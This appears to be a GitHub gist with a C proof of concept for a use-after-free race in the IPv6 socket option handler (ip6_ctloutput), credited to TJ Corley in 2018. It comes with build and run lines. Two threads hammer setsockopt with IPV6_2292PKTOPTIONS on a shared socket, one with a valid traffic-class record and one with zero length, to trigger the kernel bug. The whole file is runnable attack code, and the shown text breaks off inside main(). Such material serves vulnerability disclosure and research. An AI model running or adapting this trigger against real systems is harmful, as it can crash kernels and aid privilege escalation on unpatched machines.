


Fire30/uaf.c Secret

Created Jul 6, 2020
/*
 * Race condition in ip6_ctloutput where in6p is not locked when calling
 * ip6_pcbopts, which allows for a use after free on in6p->in6p_outputopts
 * Build: gcc -std=c99 -o poc poc.c -lpthread
 * Run: ./poc
 * Discovered by TJ Corley 8/15/2018
 */
#include <netinet/in.h>
#include <pthread.h>
#include <stdio.h>
#include <sys/socket.h>
#include <sys/types.h>
/* Option number is hard-coded instead of taken from the system headers.
 * NOTE(review): 25 matches FreeBSD's value; other platforms number this
 * option differently, so the build line's target is platform-specific. */
#define IPV6_2292PKTOPTIONS 25
/* The IPv6 datagram socket both spam threads operate on. Assigned once in
 * main() before any thread is started, then only read, so no locking is
 * needed around it. */
int s;
/*
 * Thread body: builds a single IPV6_TCLASS ancillary-data record and keeps
 * re-installing it via IPV6_2292PKTOPTIONS on the shared socket `s`.
 * Never returns; the setsockopt result is deliberately not checked.
 * NOTE(review): the cmsghdr is overlaid on a plain char array, so its
 * alignment is whatever the stack happens to provide.
 */
static void spam_valid() {
    char record[CMSG_SPACE(sizeof(int))];
    struct cmsghdr *hdr = (struct cmsghdr *)record;
    int tclass = 0x4;

    hdr->cmsg_len = CMSG_LEN(sizeof tclass);
    hdr->cmsg_level = IPPROTO_IPV6;
    hdr->cmsg_type = IPV6_TCLASS;
    *(int *)CMSG_DATA(hdr) = tclass;

    printf("spamming valid IPV6_2292PKTOPTIONS\n");
    while (1) {
        setsockopt(s, IPPROTO_IPV6, IPV6_2292PKTOPTIONS, hdr,
                   CMSG_LEN(sizeof tclass));
    }
}
/*
 * Thread body: keeps issuing IPV6_2292PKTOPTIONS with an option length of
 * zero on the shared socket `s`. The zeroed buffer is presumably only there
 * to supply a non-NULL pointer; nothing on this page reads it.
 * Never returns; the setsockopt result is deliberately not checked.
 */
static void spam_zero_size_mbuf() {
    char *dummy[4] = {0};

    printf("spamming zero size mbuf\n");
    while (1) {
        setsockopt(s, IPPROTO_IPV6, IPV6_2292PKTOPTIONS, dummy, 0);
    }
}
int main() {
pthread_t t;
s = socket(AF_INET6, SOCK_DGRAM, 0);
pthread_create(&t, NULL, (void *)spam_valid, NULL);